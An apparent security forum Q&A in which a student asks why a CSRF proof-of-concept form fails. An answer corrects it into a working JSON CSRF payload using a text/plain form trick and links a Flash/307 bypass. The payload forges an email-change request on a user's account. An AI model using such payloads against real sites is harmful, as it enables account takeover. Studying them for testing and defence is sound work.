# CSRF Testing. Validation Error 422. Locale Required

Tags: web-application, penetration-test, csrf, web-service, bug-bounty

So I'm testing this site for coursework and I think it might be vulnerable CSRF however when I try to make a post request I get a validation error which says "locale" is required despite me specifying it in the request. Here's the form source code.

```
<html>
<head>
</head>
<body>
    <form action="http://account.testbank.com/api/account/v1/user/email" method="post" enctype='applicatiom/json'>
        <input name='{"email":"testuser@gmail.com" ,"locale": "en"}'>
        <input type="hidden" name="locale" id="locale" value="en-US">
        <script> document.forms[0].submit()</script>
    </form>     
</body>
</html>
```

What am I doing wrong?

Answer (score 1):

I see you want to send a JSON format; a HTML form builds a POST request taking the `name` and `value` attributes in the following way:

```
name1=value1&name2=value2
```

So, your POST request could look like this:

```
{"email":"testuser@gmail.com" ,"locale": "en"}=&locale=en-US
```

As you can see, it's an incorrect JSON format and the application could generate an error. Also, you are using the value `applicatiom/json` for the attribute `enctype` to specify the `content-type` header, but this could encode the body of POST request, something like this:

```
%7B%22email%22%3A%22testuser%40gmail.com%22%20,%22locale%22%3A%20%22en%22%7D=&locale=en-US
```

You have another incorrect JSON format.

So, if the application doesn't validate `content-type`, you could use `text/plain` instead of `applicatiom/json` and change your form in the following way:

```
<input name='{"email":"testuser@gmail.com" ,"locale": "en' value='"}'>
```

The POST request would be the following:

```
{"email":"testuser@gmail.com" ,"locale": "en="}
```

Now, you have a correct JSON format, the unique problem might be the character `=`.

If the application validates `content-type`, there is a technique about a Flash script and a HTTP Response 307, I share you a link about this technique.

[CSRF Flash 307](https://www.geekboy.ninja/blog/exploiting-json-cross-site-request-forgery-csrf-using-flash/)

I hope this information helps you.

Good luck.